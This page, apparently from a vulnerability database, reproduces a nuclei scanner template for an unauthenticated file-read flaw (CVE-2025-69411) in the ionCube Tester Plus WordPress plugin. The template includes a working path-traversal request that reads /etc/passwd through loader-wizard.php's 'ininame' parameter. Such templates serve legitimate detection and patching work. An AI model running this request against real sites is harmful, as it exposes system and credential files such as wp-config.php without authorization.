Lucene search
K

ionCube Tester Plus <= 1.3 - Local File Inclusion

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Unauthenticated path traversal in ionCube Tester Plus <=1.3 allows reading sensitive files via loader-wizard.php.

Related
Refs
Code
id: CVE-2025-69411

info:
  name: ionCube Tester Plus <= 1.3 - Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    The ionCube Tester Plus plugin for WordPress versions <= 1.3 is vulnerable to unauthenticated arbitrary file read via path traversal. The 'ininame' parameter in loader-wizard.php is not properly sanitized, allowing attackers to read  sensitive files such as wp-config.php and /etc/passwd without authentication.
  remediation: |
    Update to the latest version beyond 1.3.
  impact:
    Attackers can access unauthorized files, potentially exposing sensitive information or system files.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ioncube-tester-plus/ioncube-tester-plus-13-unauthenticated-arbitrary-file-download
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69411
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-69411
    epss-score: 0.01609
    epss-percentile: 0.72988
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: ioncube
    product: ioncube-tester-plus
    framework: wordpress
  tags: cve,cve2025,wordpress,wp,wp-plugin,lfi,ioncube-tester-plus

flow: http(1) && http(2)

http:
  - method:
    path:
      - "{{BaseURL}}/wp-content/plugins/ioncube-tester-plus/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 1.3')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s+([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ioncube-tester-plus/loader-wizard.php?page=phpconfig&download=1&ininame=../../../../../../../../etc/passwd"

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, 'text/plain')
          - regex('root:.*:0:0:', body)
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100d43117b1ca912e0b388763ecb6f925c6f8102055f98675b00d4f213fb876a0c0022100849471b8da2be8eb686c373bf22a2f90897265840a579f74e79e536f386703c7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Mar 2026 08:18Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
EPSS0.01609
SSVC
7